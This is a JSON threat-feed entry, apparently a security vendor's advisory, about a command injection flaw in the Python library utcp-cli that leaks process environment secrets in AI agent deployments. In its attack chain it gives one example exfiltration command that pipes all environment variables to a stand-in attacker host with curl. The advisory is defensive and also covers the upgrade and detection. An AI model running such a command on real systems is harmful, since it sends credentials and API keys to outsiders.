{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/secrets-leakage/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["utcp-cli (\u003c= 1.1.1)"],"_cs_severities":["high"],"_cs_tags":["command-injection","secrets-leakage","python"],"_cs_type":"advisory","_cs_vendors":["pip"],"content_html":"\u003cp\u003eThe \u003ccode\u003eutcp-cli\u003c/code\u003e library, in versions 1.1.1 and earlier, is vulnerable to command injection (CVE-2026-45370) due to the insecure handling of environment variables passed to subprocesses. Specifically, the \u003ccode\u003e_prepare_environment()\u003c/code\u003e function copies the entire \u003ccode\u003eos.environ\u003c/code\u003e dictionary to CLI subprocesses. Combined with a separate command injection vulnerability (GHSA-33p6-5jxp-p3x4) in \u003ccode\u003e_substitute_utcp_args()\u003c/code\u003e, this design allows an attacker to inject commands that can access and exfiltrate sensitive information stored in environment variables. This includes cloud provider credentials, database connection strings, LLM API keys, and internal service tokens. This vulnerability allows full process environment leakage, enabling complete system compromise for AI agent deployments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious tool configuration containing the command injection payload.\u003c/li\u003e\n\u003cli\u003eThe AI agent executes the tool, passing the malicious configuration to \u003ccode\u003eutcp-cli\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e_substitute_utcp_args()\u003c/code\u003e function fails to sanitize the attacker-supplied arguments, leading to command injection.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e_prepare_environment()\u003c/code\u003e function copies the entire \u003ccode\u003eos.environ\u003c/code\u003e to the subprocess environment.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with access to all environment variables.\u003c/li\u003e\n\u003cli\u003eThe injected command, such as \u003ccode\u003eenv | curl -s -d @- https://attacker.com\u003c/code\u003e, captures the environment variables and exfiltrates them to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the environment variables, including sensitive credentials and API keys.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to steal sensitive information, including cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET), database connection strings (DATABASE_URL), LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY), and internal service tokens. The attacker can use these stolen credentials to gain unauthorized access to cloud resources, databases, LLM services, and internal systems. This can lead to data breaches, financial loss, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to \u003ccode\u003eutcp-cli \u0026gt;= 1.1.2\u003c/code\u003e to address the vulnerability and prevent environment variable leakage.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious outbound connections to unknown domains (e.g., \u003ccode\u003ehttps://attacker.com\u003c/code\u003e in the example) originating from \u003ccode\u003eutcp-cli\u003c/code\u003e processes.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule to detect command injection attempts in \u003ccode\u003eutcp-cli\u003c/code\u003e processes by monitoring for suspicious shell metacharacters in command-line arguments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-14T20:56:53Z","date_published":"2026-05-14T20:56:53Z","id":"https://feed.craftedsignal.io/briefs/2026-05-python-utcp-secrets-leakage/","summary":"A command injection vulnerability in `utcp-cli` versions 1.1.1 and earlier allows attackers to exfiltrate all process-level secrets by injecting commands into CLI subprocesses.","title":"python-utcp: Secrets Leakage via Command Injection","url":"https://feed.craftedsignal.io/briefs/2026-05-python-utcp-secrets-leakage/"}],"language":"en","title":"CraftedSignal Threat Feed — Secrets-Leakage","version":"https://jsonfeed.org/version/1.1"}